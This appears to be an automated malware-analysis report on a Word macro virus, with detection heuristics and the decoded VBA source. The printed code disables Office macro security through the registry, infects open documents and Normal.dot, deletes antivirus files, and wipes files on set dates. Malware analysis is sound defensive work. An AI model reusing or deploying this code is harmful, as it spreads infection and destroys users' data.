MALICIOUS
Risk Score: 320
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that execute when the document is closed. The macro attempts to disable Word and Excel macro security by writing a Level value of 1 to the registry keys HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Excel\Security, using a temporary registry file c:\1.reg that it imports silently with regedit.exe /s and then deletes. This lowers the security barriers for later malicious execution.
Heuristics (6)
- ClamAV: Doc.Trojan.Lily-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Lily-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11791 bytes |

SHA-256: a9f25b0710c23ff708516e02ed1a7e67a96b1ca6c980071acb5b860c6bf2f430
Detection: ClamAV: Doc.Trojan.Lily-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script; the original comments are in Russian and are translated here):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    'Lisa 2000'
    '___Do not show any errors that occur___'
    On Error Resume Next
    '___Disable virus protection for Word 97___'
    Application.Options.VirusProtection = False
    '___Disable virus protection for Word 2000, and for Excel while at it___'
    Set sm = CreateObject("Scripting.FileSystemObject")
    Set Ate = sm.CreateTextFile("c:\1.reg", True)
    Ate.WriteLine ("REGEDIT4")
    Ate.WriteLine (" ")
    Ate.WriteLine ("[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security]")
    Ate.WriteLine (Chr(34) + "Level" + Chr(34) + "=dword:00000001")
    Ate.WriteLine (" ")
    Ate.WriteLine ("[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Excel\Security]")
    Ate.WriteLine (Chr(34) + "Level" + Chr(34) + "=dword:00000001")
    Ate.Close
    MyAppID = Shell("regedit.exe /s c:\1.reg", 0)
    newHour = Hour(Now())
    newMinute = Minute(Now())
    newSecond = Second(Now()) + 5
    waitTime = TimeSerial(newHour, newMinute, newSecond)
    Kill ("c:\1.reg")
    '___Infect open documents___'
    s = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.countoflines
    d = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, s)
    For k = 1 To Application.Documents.Count
        t = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.countoflines
        If t = 0 Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
        End If
    Next k
    '___Infect Normal.dot (autoload)___'
    t = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.countoflines
    If t = 0 Then
        Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
    End If
    '___"Friend"-or-"foe" check___'
    Set ms = Application.FileSearch
    Set gato = Application.FileSearch
    With ms
        .LookIn = "c:\windows\system\"
        .FileName = "lisa.dll"
        If .Execute(SortBy:=msoSortByFileName, _
                    SortOrder:=msoSortOrderAscending) > 0 Then
            '___If friend, exit___'
            GoTo 80
            '___If foe, do harm____'
        Else
            '___Break AVP___'
            Kill ("c:\Program Files\AntiViral Toolkit Pro\*.avc")
            '___ARMAGEDDON day___'
            If (Day(Now()) = 23) And (Month(Now()) = 2) Or (Day(Now()) = 1) And (Month(Now()) = 1) Or (Day(Now()) = 8) And (Month(Now()) = 3) Or (Day(Now()) = 30) And (Month(Now()) = 4) Or (Day(Now()) = 30) And (Month(Now()) = 8) Or (Day(Now()) = 10) And (Month(Now()) = 1) Then
                With gato
                    .LookIn = "c:\"
                    .FileName = "*.doc"
                    .SearchSubFolders = True
                    If .Execute > 0 Then
                        For y = 1 To .FoundFiles.Count
                            Kill (.FoundFiles(y))
                        Next y
                    End If
                End With
                With gato
                    .LookIn = "c:\"
                    .FileName = "*.xls"
                    .SearchSubFolders = True
                    If .Execute > 0 Then
                        For y = 1 To .FoundFiles.Count
                            Kill (.FoundFiles(y))
                        Next y
                    End If
                End With
                With gato
                    .LookIn = "c:\"
                    .FileName = "*.*"
                    .SearchSubFolders = True
                    If .Execute > 0 Then
                        For y = 1 To .FoundFiles.Count
                            Kill (.FoundFiles(y))
                        Next y
                    End If
                End With
            End If
        End If
    End With
```

... (truncated)